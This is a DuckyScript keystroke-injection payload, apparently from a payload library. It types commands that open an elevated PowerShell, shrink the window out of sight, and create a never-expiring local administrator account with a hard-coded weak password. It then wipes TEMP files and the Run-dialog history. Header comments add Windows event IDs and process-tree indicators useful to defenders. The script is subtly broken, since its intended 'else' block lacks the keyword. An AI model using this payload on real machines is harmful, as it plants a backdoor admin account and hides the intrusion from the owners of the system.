Path: blob/master/payloads/library/execution/Add_Local_Admin/payload.txt
REM Title: Add_Local_Admin
REM Author: LulzAnarchyAnon
REM Description: Administrator PowerShell is opened and resized for a more stealthy payload delivery, then the payload
REM creates a local admin account on the target system, afterwards PowerShell exits, and all history is cleared.
REM This lightning-fast payload was deployed and completed in a test run in 10.57 seconds.
REM Target: Windows 10 and 11
REM Props: Darren Kitchen, and I am Jakoby
REM Version: 3.0
REM Category: Execution
REM
REM What the keystrokes and the typed PowerShell actually do (reviewer notes):
REM   - GUI r (Win+R) opens the Run dialog; the typed Start-Process -Verb RunAs requests elevation and
REM     ALT y answers the consent prompt, so an elevated console is required for everything that follows.
REM   - The first typed line starts a nested PowerShell (-noe = -NoExit, -c = -Command) whose only command
REM     shrinks the console window to 5 lines x 12 columns; the remaining lines are typed into that shell.
REM   - NET USER creates the local account "Admin2" with the hard-coded password "password" and /expires:never,
REM     NET LOCALGROUP adds it to the "Administrators" group, and WMIC sets PasswordExpires=FALSE on it.
REM   - rm empties the current user's $env:TEMP; reg delete wipes the Run-dialog MRU list under HKCU\...\RunMRU.
REM   - The two trailing exits close the nested shell first, then the elevated one.
REM Detection notes: the account creation, group change and password-expiry change are recorded in the
REM Security event log regardless of the cleanup (event IDs 4720, 4732 and 4738), and net.exe / wmic.exe
REM run as child processes of an elevated powershell.exe started from the Run dialog within a few seconds
REM of a keystroke-injection device enumerating as a USB keyboard. Only $env:TEMP contents and the RunMRU
REM key are removed, so those log entries and the process tree remain the primary indicators.

REM Open the Run dialog and request an elevated PowerShell; ALT y accepts the UAC prompt.
DELAY 200
GUI r
DELAY 200
STRINGLN powershell -Command "Start-Process PowerShell -Verb RunAs"
DELAY 500
ALT y
DELAY 500
REM Everything between STRINGLN and END_STRINGLN is typed verbatim into the elevated console.
STRINGLN
PowerShell.exe -noe -c ". mode.com con: lines=5 cols=12"
$Username = "Admin2"
$Password = "password"
$group = "Administrators"
$adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
$existing = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username }
if ($existing -eq $null) {
Write-Host "Creating new local user $Username."
& NET USER $Username $Password /add /y /expires:never
Write-Host "Adding local user $Username to $group."
& NET LOCALGROUP $group $Username /add
}
{
Write-Host "Setting password for existing local user $Username."
$existing.SetPassword($Password)
}
Write-Host "Ensuring password for $Username never expires."
& WMIC USERACCOUNT WHERE "Name='$Username'" SET PasswordExpires=FALSE
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
exit
exit
END_STRINGLN